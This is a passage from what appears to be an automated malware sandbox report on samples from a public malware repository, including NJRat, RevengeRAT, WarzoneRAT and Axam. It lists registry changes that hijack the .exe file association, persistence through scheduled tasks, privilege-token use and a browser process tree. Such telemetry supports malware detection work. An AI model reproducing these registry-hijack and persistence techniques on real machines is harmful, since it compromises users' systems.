Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\chm.file\shell\open	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe \"%1\" %*"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "Spitmaxa"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon\ = "%1"	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\shell\open	Axam.a.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Spitmaxa\DefaultIcon	Axam.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
5432	reg.exe
5760	reg.exe

NTFS ADS 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:Zone.Identifier:$DATA	WarzoneRAT.exe
File created	C:\svchost\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{621F963D-5F49-419A-991E-C4E2C68F68AA}\8tr.exe:Zone.Identifier	WINWORD.EXE
File opened for modification	C:\Users\Admin\Downloads\The-MALWARE-Repo-master.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\VanToM Folder\Server.exe\:Zone.Identifier:$DATA	VanToM-Rat.bat

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5580	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4892	schtasks.exe
1812	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 7 IoCs

pid	Process
5596	WINWORD.EXE
5596	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
6108	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3728	msedge.exe
3728	msedge.exe
2916	msedge.exe
2916	msedge.exe
3096	identity_helper.exe
3096	identity_helper.exe
1228	msedge.exe
1228	msedge.exe
3200	msedge.exe
3200	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
2520	msedge.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe
5236	NJRat.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5624	Userdata.exe
5236	NJRat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5236	NJRat.exe
Token: SeDebugPrivilege	5784	RevengeRAT.exe
Token: SeDebugPrivilege	5844	RegSvcs.exe
Token: SeDebugPrivilege	3864	WarzoneRAT.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: SeDebugPrivilege	4680	svchost.exe
Token: SeDebugPrivilege	1052	RegSvcs.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: SeDebugPrivilege	6064	svchost.exe
Token: SeDebugPrivilege	4792	RegSvcs.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: SeDebugPrivilege	6064	svchost.exe
Token: SeDebugPrivilege	5808	RegSvcs.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe
Token: SeIncBasePriorityPrivilege	5236	NJRat.exe
Token: 33	5236	NJRat.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
2916	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe
5464	msedge.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5624	Userdata.exe
2384	VanToM-Rat.bat
4616	Server.exe
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5596	WINWORD.EXE
5244	Axam.a.exe
5424	Axam.exe
5956	Axam.exe
4668	Axam.exe
3100	Axam.exe
4016	Axam.exe
1268	Axam.exe
5976	Axam.exe
5504	Axam.exe
252	Axam.exe
5572	Axam.exe
2716	Axam.exe
1556	Axam.exe
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
2820	WINWORD.EXE
4128	Axam.exe
240	Axam.exe
2112	Axam.exe
5364	Axam.exe
5920	Axam.exe
5196	Axam.exe
136	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
136	WINWORD.EXE
6108	WINWORD.EXE
6108	WINWORD.EXE
6108	WINWORD.EXE
6108	WINWORD.EXE
3404	Axam.exe
5556	Axam.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe
1032	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 3592	2916	msedge.exe	78
PID 2916 wrote to memory of 3592	2916	msedge.exe	78
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 464	2916	msedge.exe	79
PID 2916 wrote to memory of 3728	2916	msedge.exe	80
PID 2916 wrote to memory of 3728	2916	msedge.exe	80
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81
PID 2916 wrote to memory of 4400	2916	msedge.exe	81

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd0c6d3cb8,0x7ffd0c6d3cc8,0x7ffd0c6d3cd8
  2⤵
  PID:3592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:2
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
  2⤵
  PID:4400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  PID:3100
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5676 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
  2⤵
  PID:336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:1880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5332 /prefetch:8
  2⤵
  PID:760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1272 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:4660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2540 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:1
  2⤵
  PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:4636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1748 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1820,7252425145441392078,9782777957831343831,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1668 /prefetch:1
  2⤵
  PID:1968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
